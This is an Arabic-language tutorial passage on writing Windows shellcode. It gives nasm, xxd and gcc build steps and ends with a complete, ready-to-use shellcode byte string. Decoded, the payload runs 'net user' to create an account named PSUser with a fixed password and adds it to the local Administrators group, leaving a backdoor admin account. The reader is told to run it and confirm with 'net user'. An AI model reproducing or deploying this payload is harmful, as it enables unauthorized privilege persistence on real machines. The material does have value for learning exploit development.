الان نكتب كود الاسمبلي الدي يسمح لنا باستخراج الشلكود. ساحاول ان ارفقه بالشوح حتي يكون مفهوم للجميع
انا وضعت الكود في صورة ووضعت شرح ارجو ان يكون مفهوم وواضح
يمكنك تحميل الكود من هنا
الان سنبدأ في عملية استخراج الشلكود
ادخل الي Cygwin
واتجه الي مجلد العمل الي يحتوي علي السكربتات وابدأ
nasm -f bin -o adduser.bin adduser.asm
من اجل الحصول علي بين (bin file)
xxd -i adduser.bin
للحصول علي شلكود
./xxd-shellcode.sh adduser.bin
الحصول علي الشلكود في شكله النهائي جاهز للاستعمال
الان اعمل نسخ للشلكود الدي تحصلت عليه و ضعه داخل
shellcodetest.c
في المكان المخصص له بعدها
كمبايل
gcc -o adduser shellcodetest.c
الان قم بتشغيله و مبروك اول شلكود لك
./adduser.exe
للتاكد من عمل الشلكود
net user
ستجد المستخدم الجديد قد اضيف
انا تحصلت علي الشلكود التالي
\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x95\xe6\x85\x76\xff\xd3\x31\xc0\x50\xbb\xcf\x2a
\x82\x76\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20
\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x50\x53\x55\x73\x65\x72\x20\x50\x53\x50\x61
\x73\x73\x77\x64\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63
\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f
\x72\x73\x20\x2f\x41\x44\x44\x20\x50\x53\x55\x73\x65\x72\x00
